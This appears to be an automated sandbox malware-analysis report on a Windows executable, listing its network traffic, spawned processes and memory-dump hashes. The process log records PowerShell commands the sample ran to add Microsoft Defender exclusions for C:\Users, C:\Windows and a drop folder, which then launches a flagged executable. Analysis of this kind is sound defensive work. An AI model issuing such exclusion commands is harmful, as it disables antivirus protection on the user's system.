https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Mon, 23 Dec 2024 07:53:35 GMT
Content-Length: 35590
Connection: close
2024-12-23 07:53:35 UTC 14651 IN Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-23 07:53:35 UTC 16384 IN Data Ascii: Market</a><a class="submenuitem" href="https://steamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About
2024-12-23 07:53:35 UTC 3584 IN Data Ascii: OnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199804377619/badges"><div class="persona_name persona_level">Level <div class="friendPlayerLevel lvl_0"><span class="friendPlayerLevelNum">0<
2024-12-23 07:53:35 UTC 971 IN Data Ascii: "https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Pri


Target ID: 0
Start time: 02:51:47
Start date: 23/12/2024
Path: C:\Users\user\Desktop\YYjRtxS70h.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\YYjRtxS70h.exe"
Imagebase: 0x650000
File size: 13'793'970 bytes
MD5 hash: 5A59CE92B07DE68C0BE8FBD7944214E2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 02:51:47
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 02:51:51
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"
Imagebase: 0x1e0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 02:51:51
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 02:51:52
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo
Imagebase: 0x1e0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 02:51:53
Start date: 23/12/2024
Path: C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase: 0x7ff605670000
File size: 496'640 bytes
MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 7
Start time: 02:51:56
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Imagebase: 0x1e0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                        Start time:02:51:56
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                        Start time:02:51:56
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
                                                                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                        Start time:02:52:01
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
                                                                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                        Start time:02:52:01
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                        Start time:02:52:02
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
                                                                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                        Start time:02:52:17
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe"
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:476'160 bytes
                                                                                                                                                                                                                        MD5 hash:F453C5F8C736FF8C381E7022CAD85E3E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                        • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                        Start time:02:52:26
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true


Execution Graph

Execution Coverage:21%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:0%
Total number of Nodes:3
Total number of Limit Nodes:0

Control-flow Graph

• Executed
• Not Executed
Memory Dump Source
• Source File: 00000000.00000002.1790699871.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_YYjRtxS70h.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 75cb2a84473f8c33be91873517b27827fc9733365ced039de9c0356e94d826e5
• Instruction ID: 9d136861aa2351bb5e105ddb0f0b7dd133219be7fdcffcfc3f320250f22a21c6
• Opcode Fuzzy Hash: 75cb2a84473f8c33be91873517b27827fc9733365ced039de9c0356e94d826e5
• Instruction Fuzzy Hash: A312C878E00218CFDB55DFA9C984B9DBBB2FF88700F108559E809AB369DB70A945CF50

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                          control_flow_graph 164 2832309-2832340 165 2832342 164->165 166 2832347-28323d9 164->166 165->166 171 28325c8-28325d1 166->171 172 28325d7-28325de 171->172 173 28323de-28323e7 171->173 174 28323e9 173->174 175 28323ee-28324fb call 28319ac call 28319bc 173->175 174->175 193 2832525-2832540 175->193 194 28324fd-2832518 175->194 199 2832541-283255c 193->199 197 2832520-2832523 194->197 197->199 201 2832568 199->201 202 283255e 199->202 201->171 203 2832567 202->203 203->201
Memory Dump Source
• Source File: 00000000.00000002.1790699871.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_YYjRtxS70h.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b8cb1fbd8ca4de75483121325bd629c929866d82e8b0890112e9012e20b99588
• Instruction ID: 32db58d994e3b7c52f6d9775b2fa704845e29b974b1ad91d72b953066ba22ffa
• Opcode Fuzzy Hash: b8cb1fbd8ca4de75483121325bd629c929866d82e8b0890112e9012e20b99588
• Instruction Fuzzy Hash: 20811878E01208CFDB18DFA9D994A9EFBB2FF89300F209529D805AB354DB359946CF50
Control-flow Graph (graph image not rendered in text; the function calls GetConsoleWindow)
APIs: GetConsoleWindow
Memory Dump Source
• Source File: 00000000.00000002.1790699871.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_YYjRtxS70h.jbxd
Similarity
• API ID: ConsoleWindow
• String ID:
• API String ID: 2863861424-0
• Opcode ID: 41f740e76b9a5f899ddb64b989b90217ee06681b21a07e9ef8051cd290488c8a
• Instruction ID: 5c1f359343cb708eaf7d1613ae965fdd9cbb3b69648b53b35bddef6b85d3931b
• Opcode Fuzzy Hash: 41f740e76b9a5f899ddb64b989b90217ee06681b21a07e9ef8051cd290488c8a
• Instruction Fuzzy Hash: E421AEB8D002199FCB10DF99D984ADEFBF4BB49714F20915AE808B7350C775A905CFA5
Control-flow Graph (graph image not rendered in text; the function calls GetConsoleWindow)
APIs: GetConsoleWindow
Memory Dump Source
• Source File: 00000000.00000002.1790699871.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_YYjRtxS70h.jbxd
Similarity
• API ID: ConsoleWindow
• String ID:
• API String ID: 2863861424-0
• Opcode ID: b69a4fb68d5c2c410cb98db11130052634be9e5f1e7e8a4cde3f00827cb0e2af
• Instruction ID: 53e160ba26514d27ca8278a72eef028f5d7fa0be2a0a539b5486e22b435b3dce
• Opcode Fuzzy Hash: b69a4fb68d5c2c410cb98db11130052634be9e5f1e7e8a4cde3f00827cb0e2af
• Instruction Fuzzy Hash: 6621AAB8D002199FCB10DFA9D984ADEFBF4BB49724F20905AE808B7350C775A905CFA4
Memory Dump Source
• Source File: 00000000.00000002.1789546188.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d3d000_YYjRtxS70h.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2a2e5edd9225ba46740db23e1ff9fc4acb6d9ea57da64c4064e125c4a479a904
• Instruction ID: 14beb9b4827b95af457a105caa4afe292679b8052ed9bc3156a0cacc4a2ad81c
• Opcode Fuzzy Hash: 2a2e5edd9225ba46740db23e1ff9fc4acb6d9ea57da64c4064e125c4a479a904
• Instruction Fuzzy Hash: 2C01F2B1404344ABE7208A25DCC4B66BB99EF51725F18C41AED0A0B282C3799800CEB2
Memory Dump Source
• Source File: 00000000.00000002.1789546188.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d3d000_YYjRtxS70h.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4db956c1c690d5ee380a2d64c4d450742e28d3f7a5a7fe9b152a82eeaf15f924
• Instruction ID: f11a170ca45f425d424e3c444ef333f10827a591394e1d94ce20becd1b4c42d6
• Opcode Fuzzy Hash: 4db956c1c690d5ee380a2d64c4d450742e28d3f7a5a7fe9b152a82eeaf15f924
• Instruction Fuzzy Hash: 4FF06272405344AEE7208E15D884B66FF98EB51734F18C45AED095B286C379AC44CAB1
Memory Dump Source
• Source File: 00000003.00000002.1565531429.00000000027DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_27dd000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e0742c2ae489688430c53ea7370906f50d1b721e7ebed16358835ea654c7f63c
• Instruction ID: 0e811a5db2f7445fc9911291980e82f1fe488ffb5b3b3417e769fccb468e7735
• Opcode Fuzzy Hash: e0742c2ae489688430c53ea7370906f50d1b721e7ebed16358835ea654c7f63c
• Instruction Fuzzy Hash: 3B014C7240D3C4AFD7268B258C94B52BFB8DF43224F5981DBE9888F1A3D2695C45CB72
Memory Dump Source
• Source File: 00000003.00000002.1565531429.00000000027DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_27dd000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 417d9f3f6b03f650d3e694c0e413bc738ad9a2ff7083d36a4e4bbe278d025d66
• Instruction ID: 72815c74a6012021377c34b0aad32c6c7855d1ecebb65de15a11155f83f23c52
• Opcode Fuzzy Hash: 417d9f3f6b03f650d3e694c0e413bc738ad9a2ff7083d36a4e4bbe278d025d66
• Instruction Fuzzy Hash: B7012672504304AFE7305E21CCC4B67BFA8EFC1625F18C11AEC481B282C3789841CBB2
Memory Dump Source
• Source File: 00000003.00000002.1566801072.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2b80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c350fe43184ebef490af3ebb843d686b94eae266868adb08d5e5189f0a297cee
• Instruction ID: 227a70e436ec29a28cb64366a3ef43db044caa1068dd1438474fe80552943a1e
• Opcode Fuzzy Hash: c350fe43184ebef490af3ebb843d686b94eae266868adb08d5e5189f0a297cee
• Instruction Fuzzy Hash: 71F0DA35A001059FDB15CF9DD890AEEF7B1FF88324F208199E515A72A1C736EC52CB50
Memory Dump Source
• Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9f4105fdb2aee6181dcf1a5c2c0e00555edbab46c950f703027aa62f45788988
• Instruction ID: 7c67f81fbd4bf2bf96f0ecbb1294c1e8f18af05fc40f4039039ec18500510de9
• Opcode Fuzzy Hash: 9f4105fdb2aee6181dcf1a5c2c0e00555edbab46c950f703027aa62f45788988
• Instruction Fuzzy Hash: 179171B4B00715AFEB15EFB488115AEBBB2EFC8610B00892DD556AF380DF356E058BC5
Memory Dump Source
• Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
Similarity
• API ID:
• String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 730a9334e4321fb3c3ec5a12c0d62fa62a15c4138be28cc19ef5c172413041a5
                                                                                                                                                                                                                          • Instruction ID: d7ed8bba51e527c6a437f8f9650368f4f116600c55a12a090cf61686cc0d0aa8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 730a9334e4321fb3c3ec5a12c0d62fa62a15c4138be28cc19ef5c172413041a5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F9162B4B00715AFEB25EFB488115AE7BE2FFC8610B04892DD556AB380DF356E058BC5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1562192530.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_79f0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Jl$Jl$Jl$Jl$Jl$Jl$rl$rl
                                                                                                                                                                                                                          • API String ID: 0-685953168
                                                                                                                                                                                                                          • Opcode ID: a0f8c0fd173501f0938a361cf91f07954397d88d354f943718e90c275a824e86
                                                                                                                                                                                                                          • Instruction ID: 47da0797d4a623f8a39184276dc2703fe600ec87549bb65e8e80384f6c796ddc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0f8c0fd173501f0938a361cf91f07954397d88d354f943718e90c275a824e86
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 272214B1B00306DFDB249F6884417AEBBE5BF89219F14847ADA05CB381DB71DD51CBA1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1562192530.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_79f0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 158f3ffce46dbf86cd0694ee6bf9631622a4ca05f77210636417b22cdebede4f
                                                                                                                                                                                                                          • Instruction ID: 1ad4bb8f6353f348fbf13e41b814ed621aa2aaab70fd0b8b0c1caf67aa71ac6c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 158f3ffce46dbf86cd0694ee6bf9631622a4ca05f77210636417b22cdebede4f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB129AB17043528FDB159B6898013ABBBB6AFC2218F24C47BDA05CF791DB35C941C7A1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5d21a38c92cb7a8b98916a06bb20003885342f683ae0a94463a9c7fb876f3d2d
                                                                                                                                                                                                                          • Instruction ID: 0820af9dacc316222b45a5f628a4553b30e2e3005ef1ee96279eb0147cfa2516
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d21a38c92cb7a8b98916a06bb20003885342f683ae0a94463a9c7fb876f3d2d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE919E74A002058FCB15CF59C4D4AAEFBB1FF88320B248699D955AB365C735FC51CBA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3f08fd1d2cf4365eabd81579ac900be5cdc7cef9f460062dc60ef1d9e961c0f2
                                                                                                                                                                                                                          • Instruction ID: 877c29ff9692de23b1e7f9986ab33f077805b48e9d94d880ce32a8f3a8e4dd50
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f08fd1d2cf4365eabd81579ac900be5cdc7cef9f460062dc60ef1d9e961c0f2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D51F1353042119FE704DB79D844A6AB7EAFFC9225B2494BAE509CB351EB35FC01CBA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 35479f2605f82f04c7f54a1ab509b408a9e366dd0843372bac75e79a7686de78
                                                                                                                                                                                                                          • Instruction ID: 1da4795a6e83b85349930bc8eaa93a5fe1d6bad514eee6ccdb5a05a5ed304ddb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35479f2605f82f04c7f54a1ab509b408a9e366dd0843372bac75e79a7686de78
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74610371E002489FDB14DFA9D484ADDFBF1EF88324F14816AE919AB354EB30A845CB50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: bc1914f1d76d149cdb27d2864cc2ffa9d861997d1f4647e23b9de2f26c3dc4ee
                                                                                                                                                                                                                          • Instruction ID: 2c6e4e9369bd78e9f5a9a16757f099b258cec8722ec9547605b6b8e24944f336
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc1914f1d76d149cdb27d2864cc2ffa9d861997d1f4647e23b9de2f26c3dc4ee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D511471E002489FDB14CFA9D484A9DFFF1FF88314F14806AE819AB364EB34A845CB51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1562192530.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_79f0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 602bb07282a5d070244366f55cf986346886197eca54f8d920661b12e325c43f
                                                                                                                                                                                                                          • Instruction ID: 15129227b312d530d848d1563544056695772de58da2fd8939e671fcd192646d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 602bb07282a5d070244366f55cf986346886197eca54f8d920661b12e325c43f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 004128F1B00202DFCB208F24D5417BAB7B69F86218F2484ABDA009F756D739DD45CBA1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c0109a7bb5ac3aa6d9af0d82544d616bb802d905a1a6d632ac56fe18687485a0
                                                                                                                                                                                                                          • Instruction ID: 996f656b8f335bda7ba0817c5e7fe3559a01890fa2f9fabbe865e724d6617aa1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0109a7bb5ac3aa6d9af0d82544d616bb802d905a1a6d632ac56fe18687485a0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74411A34B042048FDB19DFA4C468AAEBBF1EF8E715F145499E446EB391DB35AC01CB61
                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ecf44f182e9ac1cf149838913345128f7cf0096a5b12897c006ed751e35c5f92
• Instruction ID: 8b5772d7f1b734507700c0661b4b60793a3765a42aecbaa8cc15d99c206f2a8e
• Opcode Fuzzy Hash: ecf44f182e9ac1cf149838913345128f7cf0096a5b12897c006ed751e35c5f92
• Instruction Fuzzy Hash: 54414A74A006059FCB05CF59C4D8AAEFBB1FF88324B218699D915AB364C736FC51DBA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1554698961.00000000031FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031FD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_31fd000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: eed4bb176188e785cd42e755b6f6cbd896409b4475b154f5f14c963c4f96a03a
